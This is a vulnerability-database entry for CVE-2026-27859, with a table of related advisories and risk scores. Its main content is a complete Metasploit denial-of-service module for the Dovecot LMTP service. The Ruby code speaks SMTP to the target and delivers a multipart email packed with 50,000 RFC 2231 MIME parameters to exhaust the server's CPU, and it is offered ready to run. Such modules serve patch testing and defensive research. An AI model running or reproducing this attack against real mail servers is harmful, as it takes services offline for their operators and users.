📄 Dovecot MIME Parameter CPU Exhaustion

🗓️ 22 Apr 2026 00:00:00Reported by indoushkaType

Metasploit DoS module for Dovecot LMTP CPU exhaustion from RFC 2231 MIME parameters (CVE-2026-27859).

Reporter	Title	Published	Views	Family All 48
ATTACKERKB	CVE-2026-27859	27 Mar 202608:10	–	attackerkb
AlpineLinux	CVE-2026-27859	27 Mar 202608:10	–	alpinelinux
Circl	CVE-2026-27859	27 Mar 202612:09	–	circl
CNNVD	Open-Xchange OX Dovecot Pro 安全漏洞	27 Mar 202600:00	–	cnnvd
CVE	CVE-2026-27859	27 Mar 202608:10	–	cve
Cvelist	CVE-2026-27859	27 Mar 202608:10	–	cvelist
Debian	[SECURITY] [DLA 4556-1] dovecot security update	1 May 202605:11	–	debian
Debian	[SECURITY] [DSA 6197-1] dovecot security update	5 Apr 202615:22	–	debian
Debian CVE	CVE-2026-27859	27 Mar 202608:10	–	debiancve
Tenable Nessus	Debian dla-4556 : dovecot-auth-lua - security update	15 Jun 202600:00	–	nessus

==================================================================================================================================
    | # Title     : Dovecot MIME Parameter CPU Exhaustion DoS Metasploit Module                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit module targets a Denial of Service ((CVE-2026-27859)) vulnerability in the Dovecot LMTP service caused by excessive CPU consumption.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Dos
      include Msf::Exploit::Remote::Smtp
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot MIME Parameter CPU Exhaustion DoS',
            'Description' => %q{
              Dovecot LMTP service is vulnerable to CPU exhaustion through mail messages
              containing excessive amounts of RFC 2231 MIME parameters.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-27859']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(24),
          OptString.new('MAIL_FROM', [true, 'From address', '[email protected]']),
          OptString.new('MAIL_TO', [true, 'To address', '[email protected]']),
          OptInt.new('PARAMETERS', [true, 'Number of RFC 2231 parameters', 50000])
        ])
      end
    
      def run
        print_status("Dovecot MIME Parameter CPU Exhaustion DoS (CVE-2026-27859)")
        print_status("Target: #{peer}")
    
        sock = nil
        malicious_email = build_malicious_email
    
        begin
          connect
    
          sock = self.sock
    
          res = sock.get_once
          vprint_status("Banner: #{res}")
    
          sock.put("EHLO attacker\r\n")
          res = sock.get_once
          vprint_status("EHLO response: #{res}")
    
          sock.put("MAIL FROM:<#{datastore['MAIL_FROM']}>\r\n")
          res = sock.get_once
          vprint_status("MAIL FROM response: #{res}")
    
          sock.put("RCPT TO:<#{datastore['MAIL_TO']}>\r\n")
          res = sock.get_once
          vprint_status("RCPT TO response: #{res}")
    
          sock.put("DATA\r\n")
          res = sock.get_once
          vprint_status("DATA response: #{res}")
    
          sock.put(malicious_email)
          sock.put("\r\n.\r\n")
    
          res = sock.get_once
          print_status("Delivery attempt response: #{res}")
    
          print_good("Malicious email sent - CPU exhaustion triggered")
    
        rescue ::Exception => e
          print_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
      end
    
      def build_malicious_email
        email = "From: #{datastore['MAIL_FROM']}\r\n"
        email << "To: #{datastore['MAIL_TO']}\r\n"
        email << "Subject: CVE-2026-27859 DoS Test\r\n"
        email << "MIME-Version: 1.0\r\n"
        email << "Content-Type: multipart/mixed; boundary=\"boundary\"\r\n"
        email << "\r\n"
        email << "--boundary\r\n"
        email << "Content-Type: text/plain\r\n"
        email << "\r\n"
        email << "Test message\r\n"
        email << "--boundary\r\n"
    
        parameters = []
        datastore['PARAMETERS'].to_i.times do |i|
          parameters << "param#{i}*=\"value#{i}\""
        end
    
        email << "Content-Type: application/octet-stream;\r\n"
        email << "  " + parameters.join(";\r\n  ") + "\r\n"
        email << "Content-Transfer-Encoding: base64\r\n"
        email << "\r\n"
        email << "dGVzdA==\r\n"
        email << "--boundary--\r\n"
    
        email
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

22 Apr 2026 00:00Current

5.7Medium risk

Vulners AI Score5.7

CVSS 3.15.3

EPSS0.00374

SSVC